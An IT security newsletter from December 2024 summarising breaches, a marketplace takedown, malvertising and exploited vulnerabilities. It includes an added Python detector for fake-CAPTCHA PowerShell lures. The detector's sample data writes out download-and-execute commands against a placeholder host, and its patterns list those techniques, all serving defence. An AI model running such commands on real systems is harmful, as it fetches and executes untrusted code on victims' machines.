IT Security Newsletter - 12/17/2024
Hackers seek ransom after getting SSNs, banking info from state gov't portal
Hackers trying to extort the Rhode Island government infiltrated the state's public benefits system, causing state officials to shut down online services that let residents apply for Medicaid and other assistance programs. "As part of this investigation today, we discovered that within the Rhode Island Bridges system, a cybercriminal had installed dangerous malware that constituted an urgent threat," Governor Dan McKee said at a Friday night press conference, according to The Providence Journal. READ MORE...
Rydox cybercrime marketplace seized by law enforcement, suspected admins arrested
Rydox, an online marketplace used by cybercriminals to sell hacked personal information and tools to commit fraud, has been seized in an international law enforcement operation and its suspected administrators arrested. Rydox has been operating since early 2016, and has been used to sell personally identifiable information, stolen access devices, and tools to assist cybercrime on thousands of occasions according to the US Department of Justice. READ MORE...
Texas Tech University System data breach impacts 1.4 million patients
The Texas Tech University Health Sciences Center and its El Paso counterpart suffered a cyberattack that disrupted computer systems and applications, potentially exposing the data of 1.4 million patients. The organization is a public, academic health institution that is part of the Texas Tech University System, which educates and trains healthcare professionals, conducts medical research, and provides patient care services. READ MORE...
PHP backdoor looks to be work of Chinese-linked APT group
Researchers at a China-based cybersecurity company have uncovered an advanced PHP backdoor that suggests a new asset in the arsenal of the Chinese-linked Advanced Persistent Threat group Winnti. Researchers at QiAnXin's XLab discovered the backdoor, which they named Glutton, targeting China, the United States, Cambodia, Pakistan, and South Africa. The company believes Glutton has been "undetected in the cybersecurity landscape for over a year." READ MORE...
Malicious ads push Lumma infostealer via fake CAPTCHA pages
A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot. The campaign leveraged the Monetag ad network to propagate over one million ad impressions daily across three thousand websites. The malicious operation, dubbed "DeceptionAds" by Guardio Labs and Infoblox researchers, is believed to be conducted by the threat actor known as "Vane Viper." READ MORE...
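The lure described above only works if the victim pastes the copied command into the Run dialog or a console, which means the resulting shell is a child of explorer.exe. The following detection logic is an added example, not code from the newsletter, Guardio Labs or Infoblox; the ProcEvent fields and the sample telemetry are constructed to resemble Sysmon process-creation records, and the marker list generalizes the pattern (hidden window, remote download piped to iex, a URL, and CAPTCHA wording left in the command line) rather than matching one specific campaign.

```python
import re
from dataclasses import dataclass

# Hypothetical minimal process-creation record; the field names are an
# assumption (Sysmon event ID 1 and most EDR telemetry carry equivalents).
@dataclass
class ProcEvent:
    id: int
    parent_image: str
    image: str
    command_line: str

INTERACTIVE_SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# The Run dialog (Win+R) and File Explorer launch children under explorer.exe;
# that parent is what separates a user pasting a lure from scheduled admin tooling.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Traits of a pasted fake-CAPTCHA command; each regex gets a human-readable reason.
MARKERS = [(re.compile(p, re.IGNORECASE), why) for p, why in [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "base64-encoded command"),
    (r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", "remote download"),
    (r"\b(?:iex|invoke-expression)\b", "in-memory execution"),
    (r"https?://", "URL in command line"),
    (r"captcha|not a robot|i am human|verif", "CAPTCHA lure text"),
]]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev: ProcEvent) -> list[str]:
    """Reasons an event looks like a pasted fake-CAPTCHA command; empty if it does not."""
    if basename(ev.parent_image) not in USER_LAUNCH_PARENTS:
        return []
    if basename(ev.image) not in INTERACTIVE_SHELLS:
        return []
    return [why for rx, why in MARKERS if rx.search(ev.command_line)]

def find_suspicious(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """(event id, reasons) for every event with at least one marker."""
    return [(ev.id, reasons) for ev in events if (reasons := score_event(ev))]

# Constructed sample telemetry, not real captures. example.invalid is a reserved name.
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex"'
              " # I am not a robot - reCAPTCHA Verification ID: 8421"),
    # A user opening a console by hand: same parent, no markers.
    ProcEvent(2, r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    # mshta variant of the same lure.
    ProcEvent(3, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/check.hta"),
    # Service-launched encoded command: suspicious in its own right but not this pattern.
    ProcEvent(4, r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(5, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for ev_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {ev_id}: {', '.join(reasons)}")
```

For triage on a flagged host, the text the user pasted into Win+R is retained under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so the full lure command can usually be recovered even if the shell's own history was never written.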
Does Desktop AI Come With a Side of Risk?
Artificial intelligence has come to the desktop. Microsoft 365 Copilot, which debuted last year, is now widely available. Apple Intelligence just reached general beta availability for users of late-model Macs, iPhones, and iPads. And Google Gemini will reportedly soon be able to take actions through the Chrome browser under an in-development agent feature dubbed Project Jarvis. READ MORE...
CISA Warns of Exploited Adobe ColdFusion, Windows Vulnerabilities
The US cybersecurity agency CISA warned organizations on Monday that two vulnerabilities affecting Adobe ColdFusion and Microsoft Windows have been exploited in the wild. CISA added the flaws to its Known Exploited Vulnerabilities (KEV) catalog, instructing federal agencies to address them in their environments by early January 2025. The Windows vulnerability is CVE-2024-35250, a high-severity kernel-mode driver issue that a local attacker can exploit to escalate privileges to SYSTEM. READ MORE...
FBI Warns of HiatusRAT Attacks on Cameras, DVR Systems
The FBI has issued a fresh alert on the HiatusRAT malware targeting years-old vulnerabilities in web cameras and DVR systems. Initially detailed last year, HiatusRAT has been active since mid-2022, hitting hundreds of organizations in Europe, Latin America, and the US, mainly by exploiting vulnerable high-bandwidth routers. Last year, HiatusRAT's operators were seen performing reconnaissance against a US military procurement system. READ MORE...
- ...in 1903, Orville and Wilbur Wright make the first successful flight of a self-propelled, heavier-than-air airplane.
- ...in 1936, Jorge Mario Bergoglio, the future Pope Francis, is born in Buenos Aires, Argentina.
- ...in 1969, the US Air Force ends Project Blue Book, officially closing its study of UFOs but giving rise to endless theories about alien life in the decades to follow.
- ...in 1989, the very first episode of "The Simpsons" airs as a Christmas special.